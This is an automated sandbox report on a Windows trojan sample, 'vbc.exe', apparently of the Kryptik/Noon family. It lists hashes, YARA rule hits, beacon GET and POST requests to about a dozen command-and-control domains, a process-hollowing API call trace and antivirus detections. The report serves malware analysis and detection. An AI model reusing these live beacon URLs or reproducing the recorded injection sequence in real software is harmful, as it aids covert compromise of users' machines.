Summary | ZeroBOX

vbc.exe

Category Machine Started Completed
FILE s1_win7_x6402 April 9, 2021, 11:32 a.m. April 9, 2021, 11:36 a.m.
Size 378.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 29e8627d7b80c21fc98c82314f3df5e2
SHA256 98bf20a283219c4cc786234b7d389766fddbe3b095d13c9109f5406128e83103
CRC32 251DAACF
ssdeep 6144:1wpTcyLItYxn3QDQN/rismCZyxB7HZ7g+xsoyEnGYgGI:1wpTd063QDQNSCZQB757txnG5l
Yara
  • win_files_operation - Affect private profile
  • PE_Header_Zero - PE File Signature Zero
  • OS_Processor_Check_Zero - OS Processor Check Signature Zero
  • IsPE32 - (no description)
  • IsWindowsGUI - (no description)
  • HasOverlay - Overlay Check

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
section .fipuh
section .wuta
section .new
resource name None
suspicious_features GET method with no useragent header suspicious_request GET http://www.likehowto.com/nnmd/?MvyX=vRs6n4JRqe7Dt1ePX7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWm4G1cXUL/JYAaDcAVpU&VPXh=GfIH
suspicious_features GET method with no useragent header suspicious_request GET http://www.blackmantech.fitness/nnmd/?MvyX=lO2MoVQRnuQliAFYE73xMyvXdf5GkN1z0aKfIeNynRlJRWydjj13mXpuZu0yLgH94KMPbX89&VPXh=GfIH
suspicious_features GET method with no useragent header suspicious_request GET http://www.v6b9.com/nnmd/?MvyX=gV2AbXYKVwSAsb+8nC8axD7ttDEHMWE14ZwdTbh1N+cWOvek4i/5BjlkPX2fM7PyTyPhjKAM&VPXh=GfIH
suspicious_features GET method with no useragent header suspicious_request GET http://www.syduit.com/nnmd/?MvyX=btHTA+j+pbtfXH5E0zmzPQOf49f/oMdnjHUIX6frz8d7so2A3ybxPAuEpf9zLJV/bTrkMS/E&VPXh=GfIH
suspicious_features GET method with no useragent header suspicious_request GET http://www.suns-brothers.com/nnmd/?MvyX=63wAYXMAzZTyFdbPgeduTMtZQGbVrU0zhbRFEm9YjPWC1DQzp3NhpDeeRLu3xGp5GtFJL6GJ&VPXh=GfIH
suspicious_features GET method with no useragent header suspicious_request GET http://www.samanthataylordesigns.com/nnmd/?MvyX=sVCsP3nYsNXlW4I2EqS3kB52HqjY7ZxXgFnkWYmWMO+p6LFBhhCa6Vg5Ah+KszLMV8i2Kccl&VPXh=GfIH
suspicious_features GET method with no useragent header suspicious_request GET http://www.nevertraveled.com/nnmd/?MvyX=SYHpgW1+yTc6qOKF4v10dIdNZgCXdFrWPz9etZYqQDofpKwnSaEEWXbh+jQacXfWTKEwdu6J&VPXh=GfIH
suspicious_features GET method with no useragent header suspicious_request GET http://www.scott-re.online/nnmd/?MvyX=YoDjfv9GFAPxmC/m/YrXEnPJINgN/ZGcUJt6czxWwkNRV1BAm2Kb0tXyCx+SX/c+MMPjJ8db&VPXh=GfIH
suspicious_features GET method with no useragent header suspicious_request GET http://www.privateselights.com/nnmd/?MvyX=dawykA9rH5soyxzZFh5d+iBJ+hfpeYhwH/qPHzsHNYdF391QiUTLENSw3p0VO2IwMqD1IPNI&VPXh=GfIH
suspicious_features GET method with no useragent header suspicious_request GET http://www.vegrebel.com/nnmd/?MvyX=iedGY0/jFY2caMs7ufAPjCijJp09b4Pnd9J45dLvz29YUuAPrQ24EB7QdiStDbxe7UevWaqL&VPXh=GfIH
suspicious_features GET method with no useragent header suspicious_request GET http://www.israeldigitalblog.net/nnmd/?MvyX=RhKwvNZRq71Tr7FYOMJQyYr9uwiqQ6gfx1wpRXHKZy0OdMvbN5VELlZYmhSRX7q9d8bqmLsF&VPXh=GfIH
suspicious_features GET method with no useragent header suspicious_request GET http://www.7985699.com/nnmd/?MvyX=5eMcWOIRhRBDg7AFbH6T6n9ePY1bhRzkU2oAA9D0h2F0eFvVxskwV2U654U3C4UMb8hOzpd5&VPXh=GfIH
suspicious_features GET method with no useragent header suspicious_request GET http://www.gyanankuram.com/nnmd/?MvyX=j6F9pRy7tXXpoPJbhXH0u9bQB/JXHzG14SbRVROnOZPq6dP/rmVCAUmrxE7tDLQY1WcLF6On&VPXh=GfIH
request GET http://www.likehowto.com/nnmd/?MvyX=vRs6n4JRqe7Dt1ePX7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWm4G1cXUL/JYAaDcAVpU&VPXh=GfIH
request POST http://www.blackmantech.fitness/nnmd/
request GET http://www.blackmantech.fitness/nnmd/?MvyX=lO2MoVQRnuQliAFYE73xMyvXdf5GkN1z0aKfIeNynRlJRWydjj13mXpuZu0yLgH94KMPbX89&VPXh=GfIH
request POST http://www.v6b9.com/nnmd/
request GET http://www.v6b9.com/nnmd/?MvyX=gV2AbXYKVwSAsb+8nC8axD7ttDEHMWE14ZwdTbh1N+cWOvek4i/5BjlkPX2fM7PyTyPhjKAM&VPXh=GfIH
request POST http://www.syduit.com/nnmd/
request GET http://www.syduit.com/nnmd/?MvyX=btHTA+j+pbtfXH5E0zmzPQOf49f/oMdnjHUIX6frz8d7so2A3ybxPAuEpf9zLJV/bTrkMS/E&VPXh=GfIH
request POST http://www.suns-brothers.com/nnmd/
request GET http://www.suns-brothers.com/nnmd/?MvyX=63wAYXMAzZTyFdbPgeduTMtZQGbVrU0zhbRFEm9YjPWC1DQzp3NhpDeeRLu3xGp5GtFJL6GJ&VPXh=GfIH
request POST http://www.samanthataylordesigns.com/nnmd/
request GET http://www.samanthataylordesigns.com/nnmd/?MvyX=sVCsP3nYsNXlW4I2EqS3kB52HqjY7ZxXgFnkWYmWMO+p6LFBhhCa6Vg5Ah+KszLMV8i2Kccl&VPXh=GfIH
request POST http://www.nevertraveled.com/nnmd/
request GET http://www.nevertraveled.com/nnmd/?MvyX=SYHpgW1+yTc6qOKF4v10dIdNZgCXdFrWPz9etZYqQDofpKwnSaEEWXbh+jQacXfWTKEwdu6J&VPXh=GfIH
request POST http://www.scott-re.online/nnmd/
request GET http://www.scott-re.online/nnmd/?MvyX=YoDjfv9GFAPxmC/m/YrXEnPJINgN/ZGcUJt6czxWwkNRV1BAm2Kb0tXyCx+SX/c+MMPjJ8db&VPXh=GfIH
request POST http://www.privateselights.com/nnmd/
request GET http://www.privateselights.com/nnmd/?MvyX=dawykA9rH5soyxzZFh5d+iBJ+hfpeYhwH/qPHzsHNYdF391QiUTLENSw3p0VO2IwMqD1IPNI&VPXh=GfIH
request POST http://www.vegrebel.com/nnmd/
request GET http://www.vegrebel.com/nnmd/?MvyX=iedGY0/jFY2caMs7ufAPjCijJp09b4Pnd9J45dLvz29YUuAPrQ24EB7QdiStDbxe7UevWaqL&VPXh=GfIH
request POST http://www.israeldigitalblog.net/nnmd/
request GET http://www.israeldigitalblog.net/nnmd/?MvyX=RhKwvNZRq71Tr7FYOMJQyYr9uwiqQ6gfx1wpRXHKZy0OdMvbN5VELlZYmhSRX7q9d8bqmLsF&VPXh=GfIH
request POST http://www.7985699.com/nnmd/
request GET http://www.7985699.com/nnmd/?MvyX=5eMcWOIRhRBDg7AFbH6T6n9ePY1bhRzkU2oAA9D0h2F0eFvVxskwV2U654U3C4UMb8hOzpd5&VPXh=GfIH
request POST http://www.gyanankuram.com/nnmd/
request GET http://www.gyanankuram.com/nnmd/?MvyX=j6F9pRy7tXXpoPJbhXH0u9bQB/JXHzG14SbRVROnOZPq6dP/rmVCAUmrxE7tDLQY1WcLF6On&VPXh=GfIH
request POST http://www.blackmantech.fitness/nnmd/
request POST http://www.v6b9.com/nnmd/
request POST http://www.syduit.com/nnmd/
request POST http://www.suns-brothers.com/nnmd/
request POST http://www.samanthataylordesigns.com/nnmd/
request POST http://www.nevertraveled.com/nnmd/
request POST http://www.scott-re.online/nnmd/
request POST http://www.privateselights.com/nnmd/
request POST http://www.vegrebel.com/nnmd/
request POST http://www.israeldigitalblog.net/nnmd/
request POST http://www.7985699.com/nnmd/
request POST http://www.gyanankuram.com/nnmd/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 8212
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 131072
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03eac000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8212
region_size: 172032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 7688
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
section {u'size_of_data': u'0x0004ae00', u'virtual_address': u'0x00001000', u'entropy': 7.494906807445011, u'name': u'.text', u'virtual_size': u'0x0004ac63'} entropy 7.49490680745 description A section with a high entropy has been found
entropy 0.795484727756 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
host 172.217.25.14
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 7688
region_size: 163840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 7688
process_handle: 0x00000080
1 1 0
Process injection Process 8212 called NtSetContextThread to modify thread in remote process 7688
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4312976
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 7688
1 0 0
Process injection Process 8212 resumed a thread in remote process 7688
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 7688
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 6192
thread_handle: 0x0000007c
process_identifier: 7688
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\vbc.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000080
1 1 0

NtGetContextThread

thread_handle: 0x0000007c
1 0 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 4096
process_identifier: 7688
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

process_identifier: 7688
region_size: 163840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 7688
process_handle: 0x00000080
1 1 0

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4312976
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 7688
1 0 0

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 7688
1 0 0
Bkav W32.AIDetect.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Graftor.938549
FireEye Generic.mg.29e8627d7b80c21f
Qihoo-360 Win32/Trojan.Generic.HwoCcnIA
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
Alibaba Trojan:Win32/Kryptik.fd76aa5c
K7GW Trojan ( 0057a5e41 )
CrowdStrike win/malicious_confidence_100% (W)
Cyren W32/Kryptik.DTT.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Kryptik.HKII
APEX Malicious
Avast Win32:DropperX-gen [Drp]
Kaspersky UDS:Trojan-Spy.Win32.Noon.gen
Paloalto generic.ml
AegisLab Trojan.Win32.Noon.l!c
Tencent Win32.Trojan.Inject.Auto
Sophos ML/PE-A
McAfee-GW-Edition BehavesLike.Win32.Trojan.fh
Emsisoft Trojan.Agent (A)
SentinelOne Static AI - Malicious PE
Kingsoft Win32.Troj.Undef.(kcloud)
Microsoft Trojan:Win32/Glupteba!ml
Cynet Malicious (score: 100)
Acronis suspicious
McAfee Artemis!29E8627D7B80
VBA32 BScope.Trojan.Wacatac
Malwarebytes Trojan.MalPack.GS
Rising Trojan.Kryptik!1.D4B0 (CLOUD)
Ikarus Win32.Outbreak
Fortinet W32/Kryptik.HKID!tr
BitDefenderTheta Gen:NN.ZexaF.34670.xC1@aWfbpggG
AVG Win32:DropperX-gen [Drp]
Cybereason malicious.0a3108